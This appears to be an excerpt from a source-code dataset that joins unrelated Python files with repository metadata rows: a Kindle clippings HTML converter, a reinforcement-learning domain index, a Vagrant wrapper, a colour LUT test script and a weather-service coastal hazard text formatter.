logger.info('{}: Existing MD5 not found. A new file will be uploaded.'.format(worker))
logger.info('{}: File: {}'.format(worker, filename))
logger.info('{}: Existing: {} New: {}'.format(worker, existing_md5, generated_md5))
upload_file(worker, filename, save_path, upload_file_prefix, config_info)
| 51.320513 | 131 | 0.673995 | 0 | 0 | 0 | 0 | 2,621 | 0.654759 | 0 | 0 | 1,186 | 0.296278 |
0597da213baf4860aef1103fe9f6eaf312ad6be5 | 9,246 | py | Python | Klipps/convert.py | rafalkaron/KindleClippingsBeautifier | 10d79da2a073f8867041a2520d7a234937237243 | ["MIT"] | 1 | 2020-05-25T11:30:54.000Z | 2020-05-25T11:30:54.000Z | Klipps/convert.py | rafalkaron/KindleClippingsBeautifier | 10d79da2a073f8867041a2520d7a234937237243 | ["MIT"] | null | null | null | Klipps/convert.py | rafalkaron/KindleClippingsBeautifier | 10d79da2a073f8867041a2520d7a234937237243 | ["MIT"] | null | null | null |
# coding: utf-8
import re
import datetime
from .feed import read_file
__author__ = "Rafał Karoń <rafalkaron@gmail.com>"
def clipps_str_to_html_str(clipps_str):
"""Return a string that contains the converted \"Kindle Clippings.txt file\" to HTML."""
# ADD ELEMENTS (SVG favicon encoded with: https://yoksel.github.io/url-encoder/)
pre_elements = r"""<!DOCTYPE html>
<html>
<head>
<title>Kindle Clippings</title>
<meta charset="utf-8">
<link href="data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8' standalone='no'%3F%3E%3C!-- Created with Inkscape (http://www.inkscape.org/) --%3E%3Csvg xmlns:dc='http://purl.org/dc/elements/1.1/' xmlns:cc='http://creativecommons.org/ns%23' xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns%23' xmlns:svg='http://www.w3.org/2000/svg' xmlns='http://www.w3.org/2000/svg' xmlns:sodipodi='http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd' xmlns:inkscape='http://www.inkscape.org/namespaces/inkscape' width='1000' height='1000' viewBox='0 0 264.58335 264.58335' version='1.1' id='svg8' inkscape:version='0.92.4 (5da689c313, 2019-01-14)' sodipodi:docname='klipps3.svg' inkscape:export-filename='C:%5CUsers%5Crafal%5CDesktop%5Cklipps3.png' inkscape:export-xdpi='72.000008' inkscape:export-ydpi='72.000008'%3E%3Ctitle id='title3713'%3EKlipps%3C/title%3E%3Cdefs id='defs2' /%3E%3Csodipodi:namedview id='base' pagecolor='%23515151' bordercolor='%23000000' borderopacity='1' inkscape:pageopacity='0.20784314' inkscape:pageshadow='2' inkscape:zoom='0.25' inkscape:cx='30.072603' inkscape:cy='582.33116' inkscape:document-units='px' inkscape:current-layer='layer1' showgrid='false' inkscape:window-width='1842' inkscape:window-height='1057' inkscape:window-x='70' inkscape:window-y='-8' inkscape:window-maximized='1' units='px' inkscape:showpageshadow='false' showborder='true' inkscape:pagecheckerboard='false' showguides='true' inkscape:guide-bbox='true'%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0,1' id='guide3724' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='1,0' id='guide3726' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='79.375005,79.375005' orientation='-0.70710678,0.70710678' id='guide3748' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0.70710678,0.70710678' id='guide3750' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458327,150.45027' orientation='-0.70710678,0.70710678' id='guide3776' inkscape:locked='false' /%3E%3Csodipodi:guide position='150.45027,26.458323' orientation='-0.70710678,0.70710678' id='guide3778' inkscape:locked='false' /%3E%3Csodipodi:guide position='114.13307,238.12501' orientation='0.70710678,0.70710678' id='guide3780' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458335,150.45028' orientation='0.70710678,0.70710678' id='guide3782' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='150.45028,26.458334' orientation='1,0' id='guide3801' inkscape:locked='false' /%3E%3Csodipodi:guide position='238.12501,114.13307' orientation='0,1' id='guide3803' inkscape:locked='false' /%3E%3Csodipodi:guide position='132.29167,114.13307' orientation='-0.70710678,0.70710678' id='guide3806' inkscape:locked='false' /%3E%3Csodipodi:guide position='26.458336,150.45028' orientation='0,1' id='guide3826' inkscape:locked='false' /%3E%3C/sodipodi:namedview%3E%3Cmetadata id='metadata5'%3E%3Crdf:RDF%3E%3Ccc:Work rdf:about=''%3E%3Cdc:format%3Eimage/svg+xml%3C/dc:format%3E%3Cdc:type rdf:resource='http://purl.org/dc/dcmitype/StillImage' /%3E%3Cdc:title%3EKlipps%3C/dc:title%3E%3Cdc:creator%3E%3Ccc:Agent%3E%3Cdc:title%3ERafał 
Karoń%3C/dc:title%3E%3C/cc:Agent%3E%3C/dc:creator%3E%3C/cc:Work%3E%3C/rdf:RDF%3E%3C/metadata%3E%3Cg inkscape:groupmode='layer' id='layer3' inkscape:label='Background' /%3E%3Cg inkscape:groupmode='layer' id='layer2' inkscape:label='Filling'%3E%3Ccircle style='fill:%23ffffff;stroke-width:0.22826612' id='path3736-9' cx='132.29167' cy='132.29169' r='114.13306' /%3E%3C/g%3E%3Cg inkscape:label='Icon' inkscape:groupmode='layer' id='layer1' transform='translate(0,-32.416632)'%3E%3Cpath style='fill:%23e63946;stroke-width:1.32083833;fill-opacity:1' d='M 431.36914 100 L 100 431.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 431.36914 100 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770' /%3E%3Cpath style='fill:%231d3557;fill-opacity:1;stroke-width:1.32083833' d='M 500 500 L 500 831.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 831.36914 500 L 500 500 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770-4' /%3E%3C/g%3E%3C/svg%3E%0A" rel='icon' type='image/svg'/>
</head>
<body>"""
heading = "<h1>Kindle Clippings</h1>\n<h2>"
footer = f"<footer>Generated on {datetime.datetime.now().strftime('%B %d, %Y')} at {datetime.datetime.now().strftime('%I:%M %p')} with <a target=\"_blank\" href=\"https://github.com/rafalkaron/Klipps\">Klipps</a></footer>"
post_elements = "</body>\n</html>"
html_str = "\n".join((pre_elements, heading, clipps_str, footer, post_elements))
# SEARCH AND REPLACE
html_str = re.sub(r"\n\n", "\n", html_str) # Removes empty lines
html_str = re.sub(r"==========", "<div class=\"entry\">\n<h2>", html_str) # Replaces Kindle entryies markup with the "entry" class and opens headers 2
html_str = re.sub(r"- .* \| ", "###timestamp### ", html_str) # Removes redundant information from timestamps and adds a tag that is used to optimize RE in the next lines
for added_on in re.findall(r"^###timestamp### .*", html_str, re.MULTILINE): # Shortens and wraps timestamps || MAKE THIS GENERIC FOR OTHER LANGUAGES
added_on_new = re.sub(r"###timestamp###", "", added_on) # Removes the ###timestamp### tag
added_on_new = re.sub(r":\d\d$", "", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 24h timestamps
added_on_new = re.sub(r":\d\d PM$", " PM", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 12h PM timestamps
added_on_new = re.sub(r":\d\d AM$", " AM", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 12h AM timestamps
added_on_new = re.sub(r"^ Added on ", "", added_on_new) # [Optional] Removes the "Added on" timestamp text
added_on_new = f"<div class=\"timestamp\">{added_on_new}</div>\n<blockquote>" # Wraps timestamps in timestamp divs and opens a blockquote
html_str = re.sub(added_on, added_on_new, html_str)
html_str = re.sub(r"<div class=\"timestamp\">", "</h2>\n<div class=\"timestamp\">", html_str) # Closes headers 2 before timestamps
html_str = re.sub(r"<div class=\"entry\">\n<h2>\n<footer>", "</blockquote>\n</div>\n<footer>", html_str) # Removes redundant entry divs and headers 2 before the footer
html_str = re.sub("<div class=\"entry\">\n<h2>", "</blockquote>\n</div>\n<div class=\"entry\">\n<h2>", html_str) # Closes blockquote and entry div before opening anothe entry div
html_str = re.sub(r"</h1>\n<h2>", "</h1>\n<div class=\"entry\">\n<h2>", html_str) # Opens the first element div after
return html_str
def default_style_html_str(html_str):
"""Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a default embedded CSS style."""
html_str = re.sub("<h1>", "<div class=\"frontpage\"><h1>", html_str)
html_str = re.sub("</h1>", "</h1>\n<div class=\"generator\"><p>Generated with Klipps</p></div>\n</div>", html_str)
html_str = re.sub("/>\n</head>", """/>
<style>
*{
font-family: Helvetica, Arial, sans-serif;
font-size: 100%;
margin: 0px;
}
.frontpage{
background-color: #1D3557;
height: 100vh;
}
h1{
font-size: 10vw;
text-align: center;
padding-top: 15vh;
padding-bottom: 20vh;
padding-left: 1vh;
padding-right: 1vh;
color: #F1FAEE;
}
.generator{
font-size: 3vw;
text-align: center;
color: #F1FAEE;
}
.entry{
padding: 4rem 8vw 4rem 8vw;
}
.entry:nth-child(odd){
background: #F1FAEE;
}
.entry:nth-child(even){
background: rgb(228, 235, 226);
}
h2{
font-size: 2.6rem;
color: #1D3557;
}
.timestamp{
font-size: 1.2rem;
font-weight: bold;
padding-bottom: 1rem;
color: #1D3557;
}
blockquote{
font-size: 1.5rem;
text-align: justify;
color: #1D3557;
}
footer{
font-size: 1.5rem;
padding: 2rem 1rem 2rem 1rem;
background-color: #1D3557;
color: #F1FAEE;
text-align: center;
}
a{
color: #E63946;
font-weight: bolder;
text-decoration: none;
}
</style>
</head>""", html_str)
return html_str
def custom_style_html_str(css_filepath, html_str):
"""Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a custom embedded CSS style."""
style = read_file(css_filepath)
html_str = re.sub("/>\n</head>", f"/>\n<style>\n{style}\n</style>\n</head>", html_str)
return html_str
| 72.234375 | 4,532 | 0.701709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,915 | 0.855676 |
05983c5f355ffca2350a3a76badc57638f8db8e8 | 1,308 | py | Python | rlpy/Domains/__init__.py | okkhoy/rlpy | af25d2011fff1d61cb7c5cc8992549808f0c6103 | ["BSD-3-Clause"] | 265 | 2015-01-21T08:11:12.000Z | 2021-12-21T08:06:21.000Z | rlpy/Domains/__init__.py | okkhoy/rlpy | af25d2011fff1d61cb7c5cc8992549808f0c6103 | ["BSD-3-Clause"] | 22 | 2015-03-26T17:41:43.000Z | 2019-12-19T08:47:36.000Z | rlpy/Domains/__init__.py | okkhoy/rlpy | af25d2011fff1d61cb7c5cc8992549808f0c6103 | ["BSD-3-Clause"] | 85 | 2015-02-18T00:25:15.000Z | 2021-11-15T11:10:00.000Z |
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
#from Domain import Domain
from future import standard_library
standard_library.install_aliases()
from .HelicopterHover import HelicopterHover, HelicopterHoverExtended
from .HIVTreatment import HIVTreatment
from .PuddleWorld import PuddleWorld
from .GridWorld import GridWorld
from .BlocksWorld import BlocksWorld
from .MountainCar import MountainCar
from .ChainMDP import ChainMDP
from .SystemAdministrator import SystemAdministrator
from .PST import PST
from .Pacman import Pacman
from .IntruderMonitoring import IntruderMonitoring
from .FiftyChain import FiftyChain
from .FlipBoard import FlipBoard
from .RCCar import RCCar
from .Acrobot import Acrobot, AcrobotLegacy
from .Bicycle import BicycleBalancing, BicycleRiding
from .Swimmer import Swimmer
from .Pinball import Pinball
from .FiniteTrackCartPole import (FiniteCartPoleBalance,
FiniteCartPoleBalanceOriginal,
FiniteCartPoleBalanceModern,
FiniteCartPoleSwingUp,
FiniteCartPoleSwingUpFriction)
from .InfiniteTrackCartPole import InfCartPoleBalance, InfCartPoleSwingUp
| 40.875 | 73 | 0.786697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.019878 |
0598570bbddd550266f613922fec2e9624969d88 | 365 | py | Python | mercury_engine_data_structures/adapters/enum_adapter.py | Antidote/mercury-engine-data-structures | d8e8ba1eacaa37f4fc76b78bb208ffc2cde61f64 | ["MIT"] | 2 | 2021-06-18T16:47:00.000Z | 2021-07-06T22:36:32.000Z | mercury_engine_data_structures/adapters/enum_adapter.py | Antidote/mercury-engine-data-structures | d8e8ba1eacaa37f4fc76b78bb208ffc2cde61f64 | ["MIT"] | 1 | 2021-10-01T20:26:01.000Z | 2021-10-01T20:26:01.000Z | mercury_engine_data_structures/adapters/enum_adapter.py | Antidote/mercury-engine-data-structures | d8e8ba1eacaa37f4fc76b78bb208ffc2cde61f64 | ["MIT"] | 5 | 2021-08-23T17:01:01.000Z | 2021-11-20T03:57:14.000Z |
from construct import Adapter, Int32ub, Enum
class EnumAdapter(Adapter):
def __init__(self, enum_class, subcon=Int32ub):
super().__init__(Enum(subcon, enum_class))
self._enum_class = enum_class
def _decode(self, obj, context, path):
return self._enum_class[obj]
def _encode(self, obj, context, path):
return obj.name
| 26.071429 | 51 | 0.682192 | 317 | 0.868493 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
05995048419b1dbd1bd29b14c238cf37023f8b47 | 2,740 | py | Python | lib/strider/virt/vagrantbox.py | jcftang/strider | 432a68eb1303541b6d955bd6ecf7439d1f9b0d48 | ["Apache-2.0"] | 16 | 2016-02-10T13:06:50.000Z | 2021-02-28T06:21:16.000Z | lib/strider/virt/vagrantbox.py | jcftang/strider | 432a68eb1303541b6d955bd6ecf7439d1f9b0d48 | ["Apache-2.0"] | 4 | 2016-02-20T16:33:40.000Z | 2016-05-28T10:46:06.000Z | lib/strider/virt/vagrantbox.py | jcftang/strider | 432a68eb1303541b6d955bd6ecf7439d1f9b0d48 | ["Apache-2.0"] | 1 | 2016-09-01T11:06:56.000Z | 2016-09-01T11:06:56.000Z |
import vagrant
import os
from subprocess import CalledProcessError
from strider.common.instance_data import InstanceData, SshData
import strider.common.logger
class Vagrantbox(object):
def __init__(self,
name=None,
ssh=None,
basebox=None,
bake_name=None,
bake_description=None,
user_data=None):
self.name = name
self.bake_name = bake_name
self.basebox = basebox
self.ssh = ssh
self.log = strider.utils.logger.get_logger('Vagrant')
if type(self.ssh) != dict:
raise Exception("expecting 'ssh' to be a dictionary")
self.vagrant_instance = vagrant.Vagrant()
def describe(self):
details = self._details()
if details is None:
return InstanceData(present=False)
else:
if self.ssh['username'] is not None:
username = self.ssh['username']
else:
username = "vagrant"
if self.ssh['private_key_path'] is not None:
private_key_path = self.ssh['private_key_path']
else:
private_key_path = details['IdentityFile']
port = details['Port']
host = details['HostName']
ssh_data = SshData(keyfile=private_key_path,
user=username,
host=host,
port=port)
return InstanceData(present=True,
provider_specific=details,
ssh=ssh_data)
def destroy(self):
self.log("destroying instance")
try:
self.vagrant_instance.destroy()
except CalledProcessError:
self.log("already destroyed instance")
try:
os.remove("./Vagrantfile")
except OSError:
self.log("already removed Vagrantfile")
def up(self):
self.log("determining if we need to create an instance")
try:
self.vagrant_instance.init(box_name=self.basebox)
except CalledProcessError:
self.log("already initialised instance")
try:
self.log("bring up instance")
self.vagrant_instance.up()
except CalledProcessError:
self.log("already up")
def _details(self):
try:
conf = self.vagrant_instance.conf()
return conf
except CalledProcessError:
self.log("No instance running")
return None
def bake(self):
self.log("baking vagrant box")
os.system("vagrant package --output {}.box".format(self.bake_name))
self.up()
| 31.860465 | 75 | 0.550365 | 2,578 | 0.940876 | 0 | 0 | 0 | 0 | 0 | 0 | 414 | 0.151095 |
552672dd092eb5fb84094dd67c6ad2cf6eb3df04 | 4,739 | py | Python | python/aces/lutFormats/tests/UnitTestsLutFormats.py | aforsythe/clf | 47ba8bee31bd13e4f23632c7b0a38293be31c019 | ["AMPAS"] | 43 | 2015-07-09T23:13:41.000Z | 2022-02-04T15:45:42.000Z | python/aces/lutFormats/tests/UnitTestsLutFormats.py | aforsythe/clf | 47ba8bee31bd13e4f23632c7b0a38293be31c019 | ["AMPAS"] | 1 | 2019-09-18T14:30:39.000Z | 2019-09-18T14:30:39.000Z | python/aces/lutFormats/tests/UnitTestsLutFormats.py | aforsythe/clf | 47ba8bee31bd13e4f23632c7b0a38293be31c019 | ["AMPAS"] | 9 | 2015-07-10T15:26:55.000Z | 2020-08-20T11:52:47.000Z |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The Academy / ASC Common LUT Format Sample Implementations are provided by the
Academy under the following terms and conditions:
Copyright © 2015 Academy of Motion Picture Arts and Sciences ("A.M.P.A.S.").
Portions contributed by others as indicated. All rights reserved.
A worldwide, royalty-free, non-exclusive right to copy, modify, create
derivatives, and use, in source and binary forms, is hereby granted, subject to
acceptance of this license. Performance of any of the aforementioned acts
indicates acceptance to be bound by the following terms and conditions:
* Copies of source code, in whole or in part, must retain the above copyright
notice, this list of conditions and the Disclaimer of Warranty.
* Use in binary form must retain the above copyright notice, this list of
conditions and the Disclaimer of Warranty in the documentation and/or other
materials provided with the distribution.
* Nothing in this license shall be deemed to grant any rights to trademarks,
copyrights, patents, trade secrets or any other intellectual property of
A.M.P.A.S. or any contributors, except as expressly stated herein.
* Neither the name "A.M.P.A.S." nor the name of any other contributors to this
software may be used to endorse or promote products derivative of or based on
this software without express prior written permission of A.M.P.A.S. or the
contributors, as appropriate.
This license shall be construed pursuant to the laws of the State of California,
and any disputes related thereto shall be subject to the jurisdiction of the
courts therein.
Disclaimer of Warranty: THIS SOFTWARE IS PROVIDED BY A.M.P.A.S. AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL A.M.P.A.S., OR ANY
CONTRIBUTORS OR DISTRIBUTORS, BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, RESITUTIONARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
WITHOUT LIMITING THE GENERALITY OF THE FOREGOING, THE ACADEMY SPECIFICALLY
DISCLAIMS ANY REPRESENTATIONS OR WARRANTIES WHATSOEVER RELATED TO PATENT OR
OTHER INTELLECTUAL PROPERTY RIGHTS IN THE ACES CONTAINER REFERENCE
IMPLEMENTATION, OR APPLICATIONS THEREOF, HELD BY PARTIES OTHER THAN A.M.P.A.S.,
WHETHER DISCLOSED OR UNDISCLOSED.
"""
__author__ = 'Haarm-Pieter Duiker'
__copyright__ = 'Copyright (C) 2015 Academy of Motion Picture Arts and Sciences'
__maintainer__ = 'Academy of Motion Picture Arts and Sciences'
__email__ = 'acessupport@oscars.org'
__status__ = 'Production'
__major_version__ = '1'
__minor_version__ = '0'
__change_version__ = '0'
__version__ = '.'.join((__major_version__,
__minor_version__,
__change_version__))
'''
Simple tests of the lutFormats module
Should be turned into a proper set of unit tests.
'''
import os
import sys
# Make sure we can import lutFormats
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
import lutFormats
tmpDir = "/tmp"
#aces1OCIOConfirDir = "/work/client/academy/ocio/hpd/OpenColorIO-Configs/aces_1.0.0"
aces1OCIOConfirDir = "/path/to/OpenColorIO-Configs/aces_1.0.0"
spiPath = "%s/luts/ACEScc_to_linear.spi1d" % aces1OCIOConfirDir
cspPath = "%s/baked/maya/sRGB (D60 sim.) for ACEScg Maya.csp" % aces1OCIOConfirDir
spipl = lutFormats.Registry.read( spiPath )
csppl = lutFormats.Registry.read( cspPath )
newSpiPath = "%s/ACEScc_to_linear_new.spi1d" % tmpDir
lutFormats.Registry.write(spipl, newSpiPath)
newSpi3dPath = "%s/srgb_new.spi3d" % tmpDir
lutFormats.Registry.write(csppl, newSpi3dPath, lutDataFormat="3D")
newCspPath = "%s/srgb_new_3d.csp" % tmpDir
lutFormats.Registry.write(csppl, newCspPath, lutDataFormat="3D")
newCsp1DPath = "%s/srgb_new_1d.csp" % tmpDir
lutFormats.Registry.write(csppl, newCsp1DPath)
newCsp1D3DPath = "%s/srgb_new_1d3d.csp" % tmpDir
lutFormats.Registry.write(csppl, newCsp1D3DPath, lutDataFormat="1D_3D_1D")
newClf1D3DPath = "%s/srgb_new_1d3d.clf" % tmpDir
lutFormats.Registry.write(csppl, newClf1D3DPath, lutDataFormat="1D_3D_1D")
newCtl1DPath = "%s/srgb_new_1d.ctl" % tmpDir
lutFormats.Registry.write(csppl, newCtl1DPath)
newCtl1D3DPath = "%s/srgb_new_3d.ctl" % tmpDir
lutFormats.Registry.write(csppl, newCtl1D3DPath, lutDataFormat="3D")
| 40.853448 | 84 | 0.779067 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,502 | 0.738819 |
552683d69b93369ce9f2b67f499349c272254782 | 10,177 | py | Python | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/product/Hazard_CFW_MultiPil.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | ["Apache-2.0"] | null | null | null | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/product/Hazard_CFW_MultiPil.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | ["Apache-2.0"] | null | null | null | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/product/Hazard_CFW_MultiPil.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | ["Apache-2.0"] | 1 | 2021-10-30T00:03:05.000Z | 2021-10-30T00:03:05.000Z |
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
########################################################################
# Hazard_CFW.py
#
#
##########################################################################
import GenericHazards
import string, time, re, os, types, copy
class TextProduct(GenericHazards.TextProduct):
Definition = copy.deepcopy(GenericHazards.TextProduct.Definition)
Definition['displayName'] = None
Definition['displayName'] = "BaselineHazard_CFW_<MultiPil> (Coastal/LakeShore Flooding)"
Definition["defaultEditAreas"] = "EditAreas_PublicZones_<site>_<MultiPil>"
Definition["mapNameForCombinations"] = "Zones_<site>" # Map background for creating Combinations
# Header configuration items
Definition["productName"] = "Coastal Hazard Message" # Warning! DO NOT CHANGE.
# The productName gets substituted later in the formatter!
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
#Definition["areaName"] = "Statename" # Name of state, such as "Georgia"
Definition["wfoCityState"] = "<wfoCityState>" # Location of WFO - city state
Definition["wfoCity"] = "<wfoCity>" # WFO Name as it should appear in a text product
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/CFW_<MultiPil>.txt"
Definition["bulletProd"] = 1 #If 1, the product has a bullet format
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["displayOutputDialog"] = 0 # If 1 will display results when finished
Definition["debug"] = 1
#Definition["headlineEditAreaGroup"] = "Zones" # Name of EditAreaGroup for sampling headlines
Definition["purgeTime"] = 8 # Maximum hours for expireTime from issueTime
Definition["includeCities"] = 0 # Cities included in area header
Definition["accurateCities"] = 0 # If 1, cities are based on grids;
# otherwise full list is included
Definition["cityLocation"] = "CityLocation" # City lat/lon dictionary to use
#Definition["cityDescriptor"] = "Including the cities of"
Definition["includeZoneNames"] = 1 # Zone names will be included in the area header
Definition["lineLength"] = 66 # line length
Definition["easPhrase"] = "URGENT - IMMEDIATE BROADCAST REQUESTED"
Definition["includeOverviewHeadline"] = 1 #If 1, the overview header is templated
Definition["includeOverview"] = 1 #If 1, the overview section is templated
#Definition["hazardSamplingThreshold"] = (10, None) #(%cov, #points)
###
### Text to insert below the last $$ of the product (WFO URL)
### use "" if you do not want text to appear
## Definition["urlText"] = "http://www.weather.gov/miami"
### no additional text example
Definition["urlText"] = ""
### multiple line example
## Definition["urlText"] = "For more information from NOAA/s National Weather Service visit...\n" + \
## "http://weather.gov/saltlakecity"
###
def __init__(self):
GenericHazards.TextProduct.__init__(self)
#
# These are the products allowed in the Coastal Flood Products
#
def allowedHazards(self):
allActions = ["NEW", "EXA", "EXB", "EXT", "CAN", "CON", "EXP"]
return [
('CF.W', allActions, 'CoastalFlood'), # COASTAL FLOOD WARNING
('CF.Y', allActions, 'CoastalFlood'), # COASTAL FLOOD ADVISORY
('CF.A', allActions, 'CoastalFlood'), # COASTAL FLOOD WATCH
('CF.S', allActions, 'CoastalFloodStatement'), # COASTAL FLOOD STATEMENT
('LS.W', allActions, 'CoastalFlood'), # LAKESHORE FLOOD WARNING
('LS.Y', allActions, 'CoastalFlood'), # LAKESHORE FLOOD ADVISORY
('LS.A', allActions, 'CoastalFlood'), # LAKESHORE FLOOD WATCH
('LS.S', allActions, 'CoastalFloodStatement'), # LAKESHORE FLOOD STATEMENT
('SU.W', allActions, 'HighSurf'), # HIGH SURF WARNING
('SU.Y', allActions, 'HighSurf'), # HIGH SURF ADVISORY
('BH.S', allActions, 'BeachHaz'), # Beach Hazards Statement
('RP.S', allActions, 'RipCurrent'), # HIGH RIP CURRENT RISK
]
def _bulletDict(self):
return {
"CF" : ("Coastal Flooding,Timing,Impacts"), ### coastal flood warning, advisory, watch
"LS" : ("Lake Shore Flooding,Timing,Impacts"), ### lake shore flood warning, advisory, watch
"BH" : ("Hazards,Timing,Location,Potential Impacts"), ### hazardous beach conditions
"SU" : ("Waves and Surf,Timing,Impacts"), ### high surf warning, advisory
"RP" : ("Timing,Impacts"), ### high rip current risk
}
def _bulletOrder(self):
return [
"Coastal Flooding",
"Lake Shore Flooding",
"Waves and Surf",
"Hazards",
"Timing",
"Location",
"Potential Impacts",
"Impacts",
]
#
# Overridden to allow for attribution statement
#
def _makeProduct(self, fcst, segmentAreas, argDict):
argDict["language"] = self._language
#
# This section generates the headline on the segment
#
# stuff argDict with the segmentAreas for DiscretePhrases
argDict['segmentAreas'] = segmentAreas
editArea = segmentAreas[0]
areaLabel = editArea
headlines = self.generateProduct("Hazards", argDict, area = editArea,
areaLabel=areaLabel,
timeRange = self._timeRange)
fcst = fcst + headlines
#
# This section generates the attribution statements and calls-to-action
#
hazardsC = argDict['hazards']
listOfHazards = hazardsC.getHazardList(segmentAreas)
fcst = fcst + self.hazardBodyText(listOfHazards, argDict)
#
# If an overview exists for this product, calculate it
#
self.overviewText(listOfHazards, "CFW")
#
# Clean up and return
#
fcst = self.endline(fcst, linelength=self._lineLength, breakStr=[" ", "-", "..."])
return fcst
def _postProcessProduct(self, fcst, argDict):
#
# If an overview exists for this product, insert it
#
overview = self.finalOverviewText()
overviewSearch = re.compile(r'Default overview section', re.DOTALL)
fcst = overviewSearch.sub(overview, fcst)
urgent = 0
followup = 1
prodNameKey = ''
fullKeyList = []
newList = ['NEW', 'EXA', 'EXB']
hazardsC = argDict['hazards']
segmentList = self.organizeHazards(hazardsC.rawAnalyzedTable())
for segmentAreas in segmentList:
listOfHazards = hazardsC.getHazardList(segmentAreas)
for eachHazard in listOfHazards:
if eachHazard['phensig'] not in fullKeyList:
fullKeyList.append(eachHazard['phensig'])
if eachHazard['phensig'] in ['CF.W', 'CF.A', 'LS.W', 'LS.A']:
if eachHazard['act'] in newList:
urgent = 1
# remove eas line if not urgent
if urgent == 0 and len(self._easPhrase):
fcst = fcst.replace(self._easPhrase + '\n', '', 1)
# rename the product if necessary based on VTEC codes
for each in fullKeyList:
if each in ['LS.W', 'LS.A', 'LS.Y', 'LS.S']:
productName = "Lakeshore Hazard Message"
fcst = fcst.replace(self._productName, productName, 1)
break
# Added to place line feeds in the CAP tags to keep separate from CTAs
        # str.replace works on literal text, so the Python 2 string.replace calls
        # with regex-style escaping (which could never match the product text) are
        # replaced with plain literal substitutions
        fcst = fcst.replace("PRECAUTIONARY/PREPAREDNESS ACTIONS...",
                            "\nPRECAUTIONARY/PREPAREDNESS ACTIONS...\n")
        fcst = fcst.replace(".:", ".")
        fcst = fcst.replace("\n ", "\n")
        fcst = fcst.replace("&&", "\n&&\n")
# Prevent empty Call to Action Tags
fcst = re.sub(r'\nPRECAUTIONARY/PREPAREDNESS ACTIONS\.\.\.\s*&&\n', \
"", fcst)
### to remove any empty framing code
fcst = re.sub("\|\*\s*\*\|", "", fcst)
### indent the bullet text
fcst = self._indentBulletText(fcst)
#
# Clean up multiple line feeds
#
fixMultiLF = re.compile(r'(\n\n)\n*', re.DOTALL)
fcst = fixMultiLF.sub(r'\1', fcst)
#
# Finish Progress Meter
